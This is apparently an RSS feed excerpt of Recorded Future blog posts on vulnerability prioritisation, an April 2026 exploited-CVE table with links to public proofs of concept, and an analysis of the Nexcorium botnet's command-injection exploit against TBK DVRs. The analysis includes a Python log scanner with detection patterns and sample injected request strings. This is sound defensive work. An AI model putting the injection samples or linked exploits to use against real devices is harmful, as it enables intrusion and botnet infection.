          <li>Manual validation procedures, remediation tasks with acceptance criteria and rollback plans, and post-remediation verification commands</li>
        </ol>
        <p>In this new Mythos age, this type of agentic processing and speed is going to be required as the new baseline.</p>
        <h2>Beyond vulnerabilities: the same playbook generalizes</h2>
        <p>Vulnerability disclosure is the most visible trigger for the intelligence-at-speed pattern, but it isn't the only one. The same operational logic applies wherever a new threat signal surfaces and a defender needs to act on it before the adversary monetizes it.</p>
        <p>When a brand impersonation site is stood up, the defensive sequence is the same: detection, intelligence enrichment (registrant, registrar, hosting infrastructure, historical campaign association), prioritized defensive controls (takedown coordination, blocking at email and web layers, alerting affected employees), and verification that the takedown landed. Recorded Future's Digital Risk Protection runs this loop continuously across the open, deep, and dark web.</p>
        <p>When a stolen credential surfaces in an infostealer log market, Identity Intelligence runs the same pattern: detection of credentials tied to your environment, enrichment with infection context (malware family, device, other credentials in the same log, MFA cookie capture status), prioritized response (force password reset, revoke active sessions, alert the user), and verification.</p>
        <p>The pattern is the posture. Apply intelligence at machine speed wherever the adversary is acting, across every category of threat surface. Vulnerabilities are one trigger. The work generalizes. Recorded Future is operationalizing intelligence at machine speed across our four solutions, <a href="https://www.recordedfuture.com/products/cyber-operations">Cyber Operations</a>, <a href="https://www.recordedfuture.com/use-case/digital-risk">Digital Risk Protection</a>, <a href="https://www.recordedfuture.com/products/third-party-intelligence">Third-Party Risk</a>, and <a href="https://www.recordedfuture.com/products/payment-fraud-intelligence">Payment Fraud Intelligence</a>.</p>
        <h2>What this means for defenders</h2>
        <p>The operational response to AI-driven vulnerability discovery is what separates organizations that contain exposures from those that wake up to incident response calls.</p>
        <p>We are seeing customers set up automation to move faster in response to this new reality. A large enterprise in the financial services sector used Recorded Future to transform their vulnerability management workflow. Following a major patching effort across the organization, the team built out automation between their vulnerability scanning and IT service management tools. The result: a streamlined, repeatable process and an estimated weekly time savings of over 20 hours for the team.</p>
        <p>We recommend taking these five actions so you can respond as well:</p>
        <ol>
          <li><strong>Move to autonomous intelligence-led security.</strong> Asset inventories are no longer sufficient without knowing if a vulnerability exists, if it is a priority, and what the blast radius is.</li>
          <li><strong>Compress your disclosure-to-detection cycle to minutes.</strong> Manual signature creation runs in days. Adversaries are moving in hours. Whatever your current cycle time, halving it is now baseline.</li>
          <li><strong>Demand intelligence-led prioritization, not severity scores.</strong> CVSS and EPSS describe the universe of vulnerabilities, not which ones are being weaponized against your sector this quarter. Threat intelligence helps you prioritize.</li>
          <li><strong>Take action across the full stack, not just the endpoint.</strong> AI-driven discovery surfaces flaws in app code, kernels, libraries, and cloud configurations. Defensive response requires reaching wherever the attacker might use the bug.</li>
          <li><strong>Apply the same posture across all four threat surfaces.</strong> Cyber Operations, Digital Risk Protection, Third-Party Risk, and Payment Fraud all face the same AI-augmented attacker clock speed.</li>
        </ol>
        <p>AI-driven vulnerability discovery is here. The big question is whether your systems can operate at attacker speed, with a depth of intelligence that survives executive scrutiny. If the answer isn’t a confident yes, then Mythos and the category behind it have already shifted the math against you.</p>
        <p><strong>See it in production.</strong> <a href="https://www.recordedfuture.com/get-started">Request a demo</a> to see Recorded Future Intelligence and Autonomous Threat Operations turn a vulnerability disclosure into deployable detection and action across your stack within minutes.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_10e10999bf1cb32b3906e06bc966c422681896652.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[April 2026 CVE Landscape]]></title>
            <link>https://www.recordedfuture.com/blog/april-cve-landscape</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/april-cve-landscape</guid>
            <pubDate>Fri, 15 May 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[In April 2026, Insikt Group® identified 37 high-impact vulnerabilities that should be prioritized for remediation, 35 of which had a Very Critical Recorded Future Risk Score. This represents a 19% increase from last month.]]></description>
            <content:encoded><![CDATA[
        <p>In April 2026, <a href="https://www.recordedfuture.com/research/insikt-group">Insikt Group®</a> identified <strong>37 high-impact vulnerabilities that should be prioritized for remediation</strong>, 35 of which had a Very Critical Recorded Future Risk Score. This represents a 19% increase from last month.</p>
        <p>31 of the 37 were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, and six were surfaced only through honeypot data. Those six CVEs associated with honeypots are available only to Recorded Future customers.</p>
        <p>Those 37 vulnerabilities affected products from 23 vendors. Microsoft accounted for approximately 22%, while the remaining exposure was concentrated across a range of enterprise-facing vendors, particularly security and systems management tools, collaboration and server platforms, developer and application-delivery software, remote support tools, and network-edge infrastructure.</p>
        <p>In April, Insikt Group created Nuclei templates for the missing authentication vulnerabilities in Nginx UI (CVE-2026-33032) and Marimo (CVE-2026-39987). These Nuclei templates are available to Recorded Future customers.</p>
        <h2>Quick Reference: April 2026 Vulnerability Table</h2>
        <p><em>All 31 vulnerabilities below were actively exploited in April 2026. This table does not include the 6 CVEs associated with honeypot activity. The table below also provides examples of public PoCs identified by Insikt Group®. These PoCs were not tested for accuracy or efficacy. Vulnerability management teams should exercise caution and verify the validity of PoCs before testing.</em></p>
        <div>
          <div>
            <div><strong>#</strong></div>
            <div><strong>Vulnerability</strong></div>
            <div><strong>Risk</strong><br /><strong>Score</strong></div>
            <div><strong>Vendor/Product</strong></div>
            <div><strong>KEV</strong></div>
            <div><strong>Malware Analysis</strong></div>
            <div><strong>RCE</strong></div>
            <div><strong>PoC</strong></div>
          </div>
          <div>
            <div>1</div>
            <div>CVE-2009-0238</div>
            <div>99</div>
            <div>Microsoft Office Excel, Excel Viewer, Office Compatibility Pack, Office</div>
            <div>✓</div>
            <div>
              <p>✓</p>
              <p>(available to Recorded Future Customers)</p>
            </div>
            <div>✓</div>
            <div></div>
          </div>
          <div>
            <div>2</div>
            <div>CVE-2012-1854</div>
            <div>99</div>
            <div>Microsoft Office, Visual Basic for Applications</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div></div>
          </div>
          <div>
            <div>3</div>
            <div>CVE-2020-9715</div>
            <div>99</div>
            <div>Adobe Acrobat, Acrobat Reader</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div><a href="https://blog.exodusintel.com/2021/04/20/analysis-of-a-use-after-free-vulnerability-in-adobe-acrobat-reader-dc/">✓ Link</a></div>
          </div>
          <div>
            <div>4</div>
            <div>CVE-2023-21529</div>
            <div>99</div>
            <div>Microsoft Exchange Server</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div></div>
          </div>
          <div>
            <div>5</div>
            <div>CVE-2023-27351</div>
            <div>99</div>
            <div>PaperCut NG, MF</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div></div>
          </div>
          <div>
            <div>6</div>
            <div>CVE-2023-36424</div>
            <div>99</div>
            <div>Microsoft Windows Server</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div><a href="https://github.com/zerozenxlabs/CVE-2023-36424">✓ Link</a></div>
          </div>
          <div>
            <div>7</div>
            <div>CVE-2024-1708</div>
            <div>99</div>
            <div>ConnectWise ScreenConnect</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div><a href="https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass">✓ Link</a></div>
          </div>
          <div>
            <div>8</div>
            <div>CVE-2024-27199</div>
            <div>99</div>
            <div>JetBrains TeamCity On-Premises</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div><a href="https://github.com/search?q=CVE-2024-27199&amp;type=repositories">✓ Link</a></div>
          </div>
          <div>
            <div>9</div>
            <div>CVE-2024-57726</div>
            <div>99</div>
            <div>SimpleHelp remote support software</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div></div>
          </div>
          <div>
            <div>10</div>
            <div>CVE-2024-57728</div>
            <div>99</div>
            <div>SimpleHelp remote support software</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div></div>
          </div>
          <div>
            <div>11</div>
            <div>CVE-2024-7399</div>
            <div>99</div>
            <div>Samsung MagicINFO Server</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div><a href="https://github.com/davidxbors/CVE-2024-7399-POC">✓ Link</a></div>
          </div>
          <div>
            <div>12</div>
            <div>CVE-2025-2749</div>
            <div>99</div>
            <div>Kentico Xperience</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div><a href="https://labs.watchtowr.com/bypassing-authentication-like-its-the-90s-pre-auth-rce-chain-s-in-kentico-xperience-cms/">✓ Link</a></div>
          </div>
          <div>
            <div>13</div>
            <div>CVE-2025-29635</div>
            <div>99</div>
            <div>D-Link DIR-823X</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div></div>
          </div>
          <div>
            <div>14</div>
            <div>CVE-2025-32975</div>
            <div>99</div>
            <div>Quest KACE Systems Management Appliance</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div></div>
          </div>
          <div>
            <div>15</div>
            <div>CVE-2025-48700</div>
            <div>99</div>
            <div>Synacor Zimbra Collaboration Suite (ZCS)</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div></div>
          </div>
          <div>
            <div>16</div>
            <div>CVE-2025-60710</div>
            <div>99</div>
            <div>Windows Server Host Process for Windows Tasks</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div><a href="https://github.com/search?q=CVE-2025-60710&amp;type=repositories">✓ Link</a></div>
          </div>
          <div>
            <div>17</div>
            <div>CVE-2026-1340</div>
            <div>99</div>
            <div>Ivanti Endpoint Manager Mobile</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div><a href="https://github.com/search?q=CVE-2026-1340&amp;type=repositories">✓ Link</a></div>
          </div>
          <div>
            <div>18</div>
            <div>CVE-2026-20122</div>
            <div>99</div>
            <div>Cisco Catalyst SD-WAN Manager</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div></div>
          </div>
          <div>
            <div>19</div>
            <div>CVE-2026-20128</div>
            <div>99</div>
            <div>Cisco Catalyst SD-WAN Manager</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div></div>
          </div>
          <div>
            <div>20</div>
            <div>CVE-2026-20133</div>
            <div>99</div>
            <div>Cisco Catalyst SD-WAN Manager</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div></div>
          </div>
          <div>
            <div>21</div>
            <div>CVE-2026-21643</div>
            <div>99</div>
            <div>Fortinet FortiClient EMS</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div><a href="https://github.com/search?q=CVE-2026-21643&amp;type=repositories">✓ Link</a></div>
          </div>
          <div>
            <div>22</div>
            <div>CVE-2026-32201</div>
            <div>99</div>
            <div>Microsoft SharePoint Server</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div><a href="https://github.com/B1tBit/CVE-2026-32201-exploit">✓ Link</a></div>
          </div>
          <div>
            <div>23</div>
            <div>CVE-2026-32202</div>
            <div>99</div>
            <div>Windows Shell</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div><a href="https://github.com/search?q=CVE-2026-32202&amp;type=repositories">✓ Link</a></div>
          </div>
          <div>
            <div>24</div>
            <div>CVE-2026-33825</div>
            <div>99</div>
            <div>Microsoft Defender</div>
            <div>✓</div>
            <div>
              <p>✓</p>
              <p>(available to Recorded Future Customers)</p>
            </div>
            <div></div>
            <div><a href="https://github.com/search?q=CVE-2026-33825&amp;type=repositories">✓ Link</a></div>
          </div>
          <div>
            <div>25</div>
            <div>CVE-2026-34197</div>
            <div>99</div>
            <div>Apache ActiveMQ, ActiveMQ Broker</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div><a href="https://github.com/search?q=CVE-2026-34197&amp;type=repositories">✓ Link</a></div>
          </div>
          <div>
            <div>26</div>
            <div>CVE-2026-34621</div>
            <div>99</div>
            <div>Adobe Acrobat, Acrobat Reader</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div><a href="https://github.com/search?q=CVE-2026-34621&amp;type=repositories">✓ Link</a></div>
          </div>
          <div>
            <div>27</div>
            <div>CVE-2026-35616</div>
            <div>99</div>
            <div>Fortinet FortiClient EMS</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div><a href="https://github.com/search?q=CVE-2026-35616&amp;type=repositories">✓ Link</a></div>
          </div>
          <div>
            <div>28</div>
            <div>CVE-2026-39987</div>
            <div>99</div>
            <div>Marimo</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div><a href="https://github.com/search?q=CVE-2026-39987&amp;type=repositories">✓ Link</a></div>
          </div>
          <div>
            <div>29</div>
            <div>CVE-2026-41940</div>
            <div>99</div>
            <div>cPanel, WHM, WP Squared</div>
            <div>✓</div>
            <div></div>
            <div></div>
            <div><a href="https://github.com/watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py">✓ Link</a></div>
          </div>
          <div>
            <div>30</div>
            <div>CVE-2026-3502</div>
            <div>89</div>
            <div>TrueConf Client</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div><a href="https://github.com/search?q=CVE-2026-3502&amp;type=repositories">✓ Link</a></div>
          </div>
          <div>
            <div>31</div>
            <div>CVE-2026-5281</div>
            <div>89</div>
            <div>Dawn in Google Chrome</div>
            <div>✓</div>
            <div></div>
            <div>✓</div>
            <div><a href="https://github.com/search?q=CVE-2026-5281&amp;type=repositories">✓ Link</a></div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>List of vulnerabilities that were actively exploited in April based on Recorded Future data (excluding honeypot-sourced CVEs).</em></p>
        <h2>Key Trends: March 2026</h2>
        <ul>
          <li>In April 2026, seven of the 37 vulnerabilities in this report were linked to ransomware activity.
            <ul>
              <li>Six are explicitly tied to Storm-1175's Medusa ransomware operations.</li>
              <li>CISA has also linked CVE-2026-41940 with known ransomware use (Sorry Ransomware, per open source reporting).</li>
              <li>Additionally, threat actors exploited CVE-2024-3721 in TBK DVR devices to deliver the Nexcorium botnet.</li>
            </ul>
          </li>
          <li>Sixteen of the 37 vulnerabilities enabled remote code execution (RCE), affecting products from twelve vendors: Adobe, Apache, D-Link, Fortinet, Google, Ivanti, Kentico, Marimo, Microsoft, SimpleHelp, TrueConf, and Wazuh.</li>
          <li>Insikt Group® identified public proof-of-concept (PoC) exploits for 24 of the 37 vulnerabilities in this report.</li>
          <li>The most commonly observed flaws this month were CWE-22 (Path Traversal), followed by CWE-94 (Code Injection), CWE-20 (Improper Input Validation), and CWE-306 (Missing Authentication for Critical Function).</li>
          <li>Three of the 37 vulnerabilities are at least five years old, with the oldest approximately seventeen years old, reinforcing how attackers continue to exploit long-known weaknesses in environments where patching has lagged. Additionally, the fastest observed time from a vulnerability’s public disclosure to exploitation was two days.</li>
        </ul>
        <h2>Exploitation Analysis</h2>
        <p>This section highlights some of the highest-impact, actively exploited vulnerabilities this month, specifically those linked to known threat actor campaigns, that have public PoC exploits available, or for which Insikt Group® has created Nuclei templates to detect the vulnerability. Vulnerabilities with no meaningful public technical detail are summarized in the disclosures table only.</p>
        <h2>Threat Actors Exploit TBK DVR Vulnerability (CVE-2024-3721) to Deliver Nexcorium</h2>
        <p>On April 17, 2026, FortiGuard Labs (@FortiGuardLabs on X, formerly known as Twitter), associated with Fortinet (@Fortinet), published a <a href="https://www.fortinet.com/blog/threat-research/tracking-mirai-variant-nexcorium-a-vulnerability-driven-iot-botnet-campaign">technical analysis</a> detailing a campaign that exploits TBK Digital Video Recorder (DVR) devices to deliver Nexcorium, a Mirai-based botnet. A TBK DVR device is a surveillance system recorder that captures, stores, and allows playback or remote viewing of video from connected security cameras. According to FortiGuard Labs, Nexcorium targets TBK DVR-4104 and DVR-4216 systems by exploiting CVE-2024-3721, an operating system (OS) command injection vulnerability that allows remote threat actors to execute arbitrary system commands.</p>
        <p>Based on FortiGuard Labs’ analysis, the campaign begins with the exploitation of CVE-2024-3721 through crafted requests that manipulate the <code>mdb</code> and <code>mdc</code> arguments in TBK DVR devices, which delivers a downloader script named <code>dvr</code>. The exploit includes the HTTP header <code>X-Hacked-By</code> with the value <code>Nexus Team - Exploited By Erratic</code>. The <code>dvr</code> script retrieves Nexcorium binaries with filenames beginning with <code>nexuscorp</code> for architectures such as ARM, MIPS R3000, and x86-64. The <code>dvr</code> script then sets the Nexcorium binaries’ permissions to <code>777</code>, and executes them with an argument that identifies the compromised system.</p>
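<p>As an added illustration (not code from FortiGuard Labs, Recorded Future, or this post), the following Python turns the indicators described above into a log-scanning check a defender could run over web-server or egress-proxy logs. The tab-separated log format, the rule names, the placeholder request paths, and the sample lines are all constructed for the example.</p>

```python
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

# Indicators named in the write-up above: the self-identifying header, the
# two request arguments the exploit manipulates, and the payload file names.
HACKED_BY_HEADER = "x-hacked-by"
HACKED_BY_VALUE = "Nexus Team - Exploited By Erratic"
INJECTION_PARAMS = {"mdb", "mdc"}
# Shell metacharacters that have no business inside those arguments.
SHELL_META = re.compile(r"[;|&`]|\$\(")
# The `dvr` downloader script and the `nexuscorp*` binaries it retrieves.
PAYLOAD_NAME = re.compile(r"^(dvr|nexuscorp[\w.-]*)$")


@dataclass
class Finding:
    line_no: int
    src: str
    rule: str
    detail: str


def parse_line(line):
    """Parse one line of the constructed (hypothetical) log format:
    src<TAB>method<TAB>url<TAB>Header=value;Header=value
    Returns None for lines that do not fit the format."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 4:
        return None
    src, method, url, raw_headers = parts
    headers = {}
    for pair in filter(None, raw_headers.split(";")):
        name, _, value = pair.partition("=")
        headers[name.strip().lower()] = value.strip()
    return src, method, url, headers


def check_request(line_no, src, method, url, headers):
    """Apply the three indicator rules to one parsed request."""
    findings = []
    # Rule 1: exploitation requests carry the campaign's X-Hacked-By header.
    if headers.get(HACKED_BY_HEADER) == HACKED_BY_VALUE:
        findings.append(Finding(line_no, src, "nexcorium_header", headers[HACKED_BY_HEADER]))
    parsed = urlsplit(url)
    # Rule 2: shell metacharacters inside the mdb/mdc arguments indicate a
    # command-injection attempt against CVE-2024-3721, whatever the payload.
    params = parse_qs(parsed.query, keep_blank_values=True)
    for name in sorted(INJECTION_PARAMS.intersection(params)):
        for value in params[name]:
            if SHELL_META.search(value):
                findings.append(Finding(line_no, src, "mdb_mdc_injection", f"{name}={value!r}"))
    # Rule 3: an already-compromised device fetching the downloader or a binary
    # (visible in outbound proxy or firewall logs rather than on the DVR itself).
    basename = parsed.path.rsplit("/", 1)[-1]
    if method.upper() == "GET" and PAYLOAD_NAME.match(basename):
        findings.append(Finding(line_no, src, "payload_fetch", parsed.path))
    return findings


def scan(lines):
    """Run every rule over an iterable of log lines; returns findings in log order."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        parsed = parse_line(line)
        if parsed is not None:
            findings.extend(check_request(line_no, *parsed))
    return findings


# Constructed sample traffic (not real captures): a benign request, an inbound
# request carrying the campaign header, an argument containing a shell
# metacharacter, and an outbound fetch of a payload binary by an infected device.
SAMPLE_LOG = [
    "10.0.0.5\tGET\t/index.html\tUser-Agent=Mozilla/5.0",
    "203.0.113.7\tGET\t/cgi-bin/example?mdb=ok\tX-Hacked-By=Nexus Team - Exploited By Erratic",
    "203.0.113.7\tPOST\t/cgi-bin/example?mdc=a%3Bsh\tUser-Agent=curl/8.0",
    "192.168.1.20\tGET\thttp://198.51.100.9/nexuscorp.arm7\tUser-Agent=Wget",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no} from {f.src}: {f.rule} ({f.detail})")
```

Rule 3 only fires on traffic leaving the network, so feed it egress logs; the first two rules belong on whatever sits in front of the DVR's web interface.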
        <p>Further technical details associated with this activity, including sample analysis and IoCs, are available to Recorded Future customers via Insikt Group reporting.</p>
        <p>Recorded Future customers can also access <a href="https://www.recordedfuture.com/products/threat-intelligence/malware-intelligence">Malware Intelligence</a> queries, which surface samples that connect to <em>known network indicators.</em></p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="Figure 1: Vulnerability Intelligence Card® for CVE-2024-3721 in Recorded Future" src="https://www.recordedfuture.com/media_11798d7a139f57447a6450de776e335b4a9ca2a24.png?width=750&amp;format=png&amp;optimize=medium" width="2048" height="1012" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1:</strong></em> <em><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Vulnerability Intelligence</a></em> <em>Card® for CVE-2024-3721 in Recorded Future (Source: Recorded Future)</em></div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_1239191713c0e7359a6e3e0dd047fe76e065dcc92.jpg?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[NIST NVD Enrichment Policy Change: Prioritizing Vulnerabilities with Attacker Behavior Signals]]></title>
            <link>https://www.recordedfuture.com/blog/nist-nvd-enrichment</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/nist-nvd-enrichment</guid>
            <pubDate>Thu, 14 May 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[NVD enrichment now covers only 15–20% of CVEs. Learn how Recorded Future Vulnerability Intelligence prioritizes risk using real attacker behavior signals.]]></description>
            <content:encoded><![CDATA[
        <p>As of April 15, 2026, <a href="https://www.nist.gov/news-events/news/2026/04/nist-updates-nvd-operations-address-record-cve-growth">NIST</a> enriches only CVEs that appear in the CISA Known Exploited Vulnerabilities catalog, federal government software, or software designated critical under Executive Order 14028. Everything else carries a "Lowest Priority" status: no CVSS score, no affected product mappings, no weakness classification. NIST enriched roughly 42,000 CVEs in 2025, and submissions in early 2026 are running about a third higher year-over-year. Industry <a href="https://labs.cloudsecurityalliance.org/research/csa-research-note-nist-nvd-enrichment-policy-change-20260419/">estimates</a> suggest the prioritized categories will cover only 15–20% of anticipated CVE volume going forward.</p>
        <p>For teams whose vulnerability management workflows depend on CVSS scores from NVD, this could create an operational gap. The CVEs in the unenriched backlog can signify real vulnerabilities affecting real software. They don't necessarily stop mattering because NIST didn't get to them.</p>
        <p>Recorded Future does not believe that the solution is to source CVSS scores faster. Instead, Recorded Future endeavors to provide the signals that actually reflect attacker behavior. CVSS was designed to characterize the technical properties of a vulnerability — attack vector, complexity, required privileges, potential impact. <a href="https://www.recordedfuture.com/blog/addressing-the-vulnerability-prioritization-challenge">CVSS was not designed</a> with patch prioritization as a prime concern. This distinction has always existed; the growing gap in NVD enrichment increases the importance of the right intelligence and insights that can capture attacker behavior in real time.</p>
        <h2>Where vulnerability risk actually originates</h2>
        <p>Exploit code surfaces on GitHub. Proof-of-concept development gets discussed in offensive security forums and underground communities. Ransomware operators evaluate which vulnerabilities fit their deployment pipelines. Threat actors incorporate specific CVEs into their toolkits and begin scanning in search of exploitable targets.</p>
        <p>At some point during or after that sequence, a CVE gets assigned and, under the previous policy, would eventually be enriched by NVD. By the time a practitioner sees a CVSS score in their scanner, the risk may already have materialized.</p>
        <p>The delay between attacker use and the assignment of a CVE and CVSS score is not a new dynamic. For this reason, Recorded Future's vulnerability Risk Scores were never built to depend on NVD enrichment.</p>
        <p>The intelligence that determines whether a vulnerability is dangerous originates in the technical communities, underground markets, exploit repositories, and malware ecosystems where attackers work. It does not come from institutional databases processing CVEs up to weeks or months post-assignment. NVD's policy change doesn't create a gap in Recorded Future's coverage because NVD is not the primary signal behind Recorded Future Vulnerability Intelligence.</p>
        <h2>What the model actually weighs</h2>
        <p>Recorded Future's risk scoring maps directly to the <a href="https://www.recordedfuture.com/blog/tracking-the-vulnerability-weaponization-lifecycle">vulnerability weaponization lifecycle</a>. Many of the signals fire based on where a CVE sits on that path, not on what NIST has or hasn't scored.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="Figure 1: The vulnerability weaponization lifecycle, as displayed on Recorded Future’s Vulnerability Intelligence dashboard" src="https://www.recordedfuture.com/media_18e7b00a771089f31bd5d71e189e3c85e8ab169fd.png?width=750&amp;format=png&amp;optimize=medium" width="1690" height="540" />
            </div>
          </div>
          <div>
            <div><strong>Figure 1:</strong> The vulnerability weaponization lifecycle, as displayed on Recorded Future’s Vulnerability Intelligence dashboard (Source: Recorded Future).</div>
          </div>
        </div>
        <p>The signals that carry the most weight are those tied to active exploitation in the wild — malware samples observed by Recorded Future's collection infrastructure, ransomware operations validated by Insikt Group® analysts, and other direct evidence of attacker use. Confirmed exploitation activity carries the most weight in the model, regardless of a CVE's CVSS score. These are the signals that answer the question practitioners actually need answered: is someone using this right now?</p>
        <p>Below active exploitation, the model tracks proof-of-concept availability, including the distinction between a verified and unverified PoC. Verified exploit code that demonstrates remote execution is a materially different signal from an unverified proof of concept of unknown reliability. As an example, exploit code on GitHub is not theoretical risk; it usually compresses the time between disclosure and weaponization. Recorded Future Risk Scores treat it accordingly.</p>
        <p>In addition to these collection and analytic capabilities, Recorded Future tracks web reporting about a CVE before NVD has published enrichment data. For the majority of new CVEs going forward, this pre-NVD signal may be the earliest structured intelligence available anywhere. A CVE that NIST has marked Lowest Priority can still accumulate signals across many dimensions. As a result, the absence of a CVSS score in NVD doesn't create a blind spot in Recorded Future's assessment.</p>
        <h2>CVSS still matters. It just isn't the foundation.</h2>
        <p>CVSS scores flow into the model from multiple sources. Many CVE numbering authorities (CNAs) supply CVSS scores at the point of submission, and CVSS coverage across published CVEs <a href="https://jerrygamblin.com/2026/01/01/2025-cve-data-review/">remained above 90% in 2025</a> even as NVD's independent enrichment narrowed. That doesn't mean CNA-supplied scores are interchangeable with NVD's. Academic analyses of dual-scored CVEs have documented <a href="https://dl.acm.org/doi/fullHtml/10.1145/3697090.3697109">divergence rates above 50% throughout the past decade, reaching 70% in 2023</a>, with disagreements sometimes large enough to move a vulnerability across severity tiers. For CVEs where neither NVD nor a CNA has provided scoring, Recorded Future independently assigns scores through its own analysis. CVSS occupies one position in the model, alongside signals grounded in observable attacker behavior, and those signals operate independently of whether a CVSS score exists at all.</p>
        <h2>What to do with this</h2>
        <p>Audit where your prioritization signals come from. If your program is relying entirely or primarily on CVSS scores pulled from NVD, you may have exposure, not just from the existing backlog, but from every new CVE entering the ecosystem under the new policy.</p>
        <p><a href="https://www.recordedfuture.com/products/vulnerability-intelligence">Recorded Future Vulnerability Intelligence</a>, as a part of the <a href="https://www.recordedfuture.com/products/cyber-operations">Cyber Operations</a> solution, scores every CVE against the full signal set — exploitation activity, malware and ransomware associations, proof-of-concept availability, threat actor targeting, and analyst-validated intelligence, all of it independent of NVD's enrichment pipeline. See this prioritization and automation in action with this click-through <strong><a href="https://play.goconsensus.com/ubf3a3558">tour</a></strong>.</p>
        <p>See how Vulnerability Intelligence integrates with your existing vulnerability management workflow — <a href="https://www.recordedfuture.com/demo">request a demo</a>.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_12365bca04a8a5a9269eace3f5e532561c2ba3ae9.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Beyond Acceleration and Automation: How AI + Intelligence Changes Cyber Defense]]></title>
            <link>https://www.recordedfuture.com/blog/ai-intelligence-cyber-defense</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/ai-intelligence-cyber-defense</guid>
            <pubDate>Thu, 14 May 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[The real question in modern cyber defense isn't who has more technology. It's who uses their resources more efficiently. Here's how AI fused with threat intelligence tips that balance.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Artificial intelligence is often discussed as a tool for automating and accelerating existing cybersecurity workflows. While that framing is accurate, it is incomplete. The most consequential shift occurs when AI is combined with <a href="https://www.recordedfuture.com/products/threat-intelligence">threat intelligence</a> — both intelligence about attacker capabilities and TTPs, and intelligence about our own defensive weaknesses and exposure. This combination produces qualitatively new defensive capabilities that may, for the first time, begin to structurally narrow the long-standing asymmetry between attackers and defenders.</p>
        <p>This memo examines what is genuinely new about AI-enabled defense, with particular emphasis on how the fusion of threat intelligence and AI reasoning changes the strategic calculus. It also argues that in the end, it is a question of who can most efficiently use scarce resources (compute and energy) to get the upper hand. Intelligence guides defenders in how to best use these resources to defend, thereby changing the balance of power against adversaries.</p>
        <h2>The Traditional Defender’s Dilemma</h2>
        <p>The core asymmetry in cybersecurity is well understood: defenders must protect every possible attack surface, while attackers only need to find one exploitable weakness. Defenders operate under constraints — budgets, compliance mandates, uptime requirements — while attackers can be patient, selective, and asymmetric.</p>
        <p>Traditionally, threat intelligence has been consumed by defenders as a feed: indicators of compromise, malware signatures, and published advisories. This intelligence was valuable but largely reactive and disconnected from the defender’s own environment. Knowing that a threat group uses a particular technique is only useful if you can rapidly assess whether that technique works against your infrastructure. That assessment has historically required scarce human expertise, time, and tooling — precisely the resources defenders lack.</p>
        <h2>The Automation Layer: Real But Evolutionary</h2>
        <p>A significant portion of AI’s current impact on defense is best described as automation of existing processes: faster alert triage, automated enrichment, accelerated patch prioritisation, and AI-assisted Tier 1 SOC analysis. These improvements are valuable — they compress response times, reduce analyst fatigue, and address chronic staffing shortages — but they are conceptually extensions of workflows that already existed.</p>
        <p>Similarly, AI can automate the ingestion and normalisation of threat intelligence feeds, reducing the manual work of parsing reports and extracting indicators. This is useful, but it does not change what defenders can fundamentally do with that intelligence. The real transformation lies elsewhere.</p>
        <h2>The Convergence: Where Threat Intelligence Meets AI Reasoning</h2>
        <p>The most significant shift is not AI applied to defense in isolation, nor threat intelligence consumed as a feed. It is the convergence of the two: AI systems that can reason simultaneously over what attackers are doing and what defenders are exposed to, in real time, at scale. This convergence produces capabilities that did not previously exist.</p>
